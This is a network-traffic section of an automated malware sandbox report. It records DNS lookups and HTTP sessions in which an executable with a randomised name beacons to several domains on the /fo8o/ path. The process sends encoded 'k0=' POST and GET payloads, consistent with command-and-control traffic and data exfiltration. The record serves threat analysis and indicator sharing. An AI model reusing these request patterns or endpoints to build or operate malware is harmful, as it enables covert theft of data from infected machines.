Dec 7, 2024 07:03:47.052993059 CET | 1.1.1.1 | 192.168.2.5 | 0x712a | No error (0) | empowermedeco.com | | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:04:01.620595932 CET | 1.1.1.1 | 192.168.2.5 | 0x76be | Name error (3) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
• www.3xfootball.com
• www.goldenjade-travel.com
• www.magmadokum.com
• www.rssnewscast.com
• www.techchains.info
• www.elettrosistemista.zip
• www.empowermedeco.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49738 | 154.215.72.110 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2024 07:00:31.411022902 CET | 520 | OUT | GET /fo8o/?k0=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.3xfootball.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 7, 2024 07:00:32.905463934 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 07 Dec 2024 06:00:32 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49796 | 116.50.37.244 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2024 07:00:57.395142078 CET | 798 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: k0=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
Dec 7, 2024 07:00:58.910459995 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 07 Dec 2024 06:00:58 GMT
Connection: close
Content-Length: 315
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49806 | 116.50.37.244 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2024 07:01:00.045208931 CET | 818 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: k0=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
Dec 7, 2024 07:01:01.602883101 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 07 Dec 2024 06:01:00 GMT
Connection: close
Content-Length: 315
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49813 | 116.50.37.244 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2024 07:01:02.700886011 CET | 1835 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 7, 2024 07:01:04.278106928 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 07 Dec 2024 06:01:03 GMT
Connection: close
Content-Length: 315
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  4 | 192.168.2.5 | 49819 | 116.50.37.244 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:01:05.359543085 CET | 527 | OUT | GET /fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:01:06.875571012 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Sat, 07 Dec 2024 06:01:06 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  5 | 192.168.2.5 | 49852 | 85.159.66.93 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:01:21.102893114 CET | 777 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: k0=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  6 | 192.168.2.5 | 49861 | 85.159.66.93 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:01:23.780034065 CET | 797 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: k0=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  7 | 192.168.2.5 | 49866 | 85.159.66.93 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:01:26.436085939 CET | 1814 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: k0= [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  8 | 192.168.2.5 | 49874 | 85.159.66.93 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:01:29.095707893 CET | 520 | OUT | GET /fo8o/?k0=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.magmadokum.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:02:30.422030926 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  9 | 192.168.2.5 | 49984 | 91.195.240.94 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:02:35.940668106 CET | 780 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: k0=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=
                                                                                  Dec 7, 2024 07:02:37.213833094 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                                  date: Sat, 07 Dec 2024 06:02:37 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  10 | 192.168.2.5 | 49985 | 91.195.240.94 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:02:38.592127085 CET | 800 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: k0=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf
                                                                                  Dec 7, 2024 07:02:39.868596077 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                                  date: Sat, 07 Dec 2024 06:02:39 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  11 | 192.168.2.5 | 49986 | 91.195.240.94 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:02:41.250171900 CET | 1817 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: k0=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbumzLgaA3T/XomeDmvKyhE3avR1fSEygXnYkGmlgNVQehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUPecCjzK9swDWayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdB9+BuOOEs4LKirthC28h2UyW7au3cW4PlACw9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvO/iZcESC7N+cDrmgluCEHjfQXc0V2cvBN6bVduPb1dXYDe5/WGT/pCef4uOWdjBYB3f2EIBwROeAD75Mkn4n9Gbm9RO9xHMSnAUWNtBfPdhdkU+HNFMIly/4KFW2Y3PE1IR2k1a68+R8/BBBBOIwVSCGCeSfnbUZzQBeUWLBT22wRNNq+pkmWyRUDpFvf2jyfm3jS5K5KbFyo+Q/N6MUOpbO4V9IW5yGU9dOvkF68jtOUwQnVuE34QDrlXP9Q7Q8RIajk+fsL6l23HbWMc5Rs6ZOhHPv/oN0K9yBpnczxPQwb/nUR7UgEKZD1DjVw/Itpwyrh2mukh9gARKuIkh6Dw0GhJs5mUjJZ5ykBfSPKYkHSaDVs8H6iFEa0XmrFHU8AZOyE6oSxQ5c7MfQUmgtQ950qfdhIgaLeofjVX6RZdPen2hXitfVv/8m4jR37t0NuhY5JWHwSC2h6mRHsY/Wrxf1b0F8wpfgYsZD2q/QAl3ByJjp3n6dvdP3bj+k0a9v6QyqIR5IJSPY60M8iZ [TRUNCATED]
                                                                                  Dec 7, 2024 07:02:42.527017117 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                                  date: Sat, 07 Dec 2024 06:02:42 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  12 | 192.168.2.5 | 49987 | 91.195.240.94 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:02:43.913047075 CET | 521 | OUT | GET /fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.rssnewscast.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:02:45.221385956 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  date: Sat, 07 Dec 2024 06:02:45 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  transfer-encoding: chunked
                                                                                  vary: Accept-Encoding
                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  pragma: no-cache
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RDWq73q0NrYpn1brzL4YsryGIhAvd0v7OU4mMCRVNwv8xMIKz4DzHGR61iHqOR0Hk5twVuhJ9rwhHfjfaIxREg==
                                                                                  last-modified: Sat, 07 Dec 2024 06:02:44 GMT
                                                                                  x-cache-miss-from: parking-f4f7c5ccf-n96cr
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 38 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 52 44 57 71 37 33 71 30 4e 72 59 70 6e 31 62 72 7a 4c 34 59 73 72 79 47 49 68 41 76 64 30 76 37 4f 55 34 6d 4d 43 52 56 4e 77 76 38 78 4d 49 4b 7a 34 44 7a 48 47 52 36 31 69 48 71 4f 52 30 48 6b 35 74 77 56 75 68 4a 39 72 77 68 48 66 6a 66 61 49 78 52 45 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                  Data Ascii: 859<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RDWq73q0NrYpn1brzL4YsryGIhAvd0v7OU4mMCRVNwv8xMIKz4DzHGR61iHqOR0Hk5twVuhJ9rwhHfjfaIxREg==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
